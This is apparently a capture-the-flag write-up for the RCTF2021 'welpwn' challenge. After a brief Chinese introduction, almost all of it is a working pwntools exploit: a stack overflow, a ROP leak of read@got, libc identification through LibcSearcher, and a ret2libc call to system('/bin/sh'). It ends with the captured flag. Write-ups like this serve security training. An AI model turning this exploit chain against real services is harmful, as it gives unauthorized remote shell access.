[RCTF2021]welpwn

题目分析

这一题是拿来测试 LibcSearcher 的，没什么好分析的，直接上 EXP。注意：LibcSearcher 只凭一个泄露地址的低 12 位去匹配 libc，候选不唯一时会让你手动选择，选错会导致第二阶段直接崩溃；脚本里注释掉的那一行就是这次最终匹配到的 libc 版本。

from pwn import *
from LibcSearcher import *

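# --- Stage 0: connection, context, gadgets -------------------------------
# The host/port are the challenge instance at the time of writing; kept as-is
# so the writeup stays reproducible, not because the instance is still up.
r = remote('61.147.171.105',63406)
context(os = 'linux',log_level = "debug")

# ROP gadgets from the (non-PIE) binary.  By their names and the addresses these
# are presumably the __libc_csu_init tail (pop r12..r15 ; ret and the mis-aligned
# pop rdi / pop rsi ; ret inside it) -- confirm with ROPgadget before reuse.
pop_rdi = 0x4008a3
pop_rsi = 0x4008a1    # not used by this solve; kept for reference
pop_4 = 0x40089c      # pops four qwords, then ret
main_addr = 0x4007CD  # return here after the leak to get a second overflow

elf = ELF("./welpwn")
puts_plt = elf.plt['puts']
read_got = elf.got['read']

# --- Stage 1: leak read@libc -------------------------------------------
# 0x18 bytes of padding reach the saved return address.  Only pop_4 needs to
# land in the overflowed frame; pop_4 then (presumably) skips four qwords of
# the original input buffer and the chain continues with
# puts(read@got) -> main, giving us a second round of input for stage 2.
r.recvuntil(b"Welcome to RCTF\n")
payload = b'a' * 0x18 + p64(pop_4) + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(main_addr)
r.sendline(payload)

# Parse the leak.  recvn() (not recv()) guarantees the exact byte count, so a
# fragmented TCP read cannot shift the 6 leaked bytes and produce a bogus
# address that LibcSearcher would then happily "identify".
r.recvuntil(b'a' * 0x18)
r.recvn(3)
read_addr = u64(r.recvn(6).ljust(8,b'\x00'))
print("read:",hex(read_addr))
# Sanity-check before trusting the leak: on x86-64 Linux libc is normally
# mapped at 0x7f........; anything else means the parse above is misaligned,
# not a real leak.  log.error() aborts the script instead of continuing with
# garbage.
if read_addr >> 40 != 0x7f:
    log.error("leaked read@libc looks wrong: %#x" % read_addr)

# --- Stage 2: identify libc, call system("/bin/sh") ---------------------
# LibcSearcher matches on the low 12 bits of a single symbol; if several
# candidates match it prompts for a choice, and a wrong pick crashes below.
libc = LibcSearcher("read", read_addr)
# The libc this solve ended up matching, per the original note -- with it on
# disk the searcher can be replaced by a local ELF:
# libc = ELF('./libc6_2.23-0ubuntu10_amd64.so')
libc_base = read_addr - libc.dump("read")
system = libc_base + libc.dump("system")
print("system:",hex(system))
bin_sh = libc_base + libc.dump("str_bin_sh")   # "str_bin_sh" is LibcSearcher's name for the "/bin/sh" string
print("bin_sh:",hex(bin_sh))

# Same overflow again, this time ret2libc: pop rdi = "/bin/sh" ; system.
payload =b'a' * 0x18 +p64(pop_4) + p64(pop_rdi) + p64(bin_sh) + p64(system)
r.sendline(payload)
r.interactive()
# cyberpeace{45c1180b9ea8e1f0fb88c08518427f51}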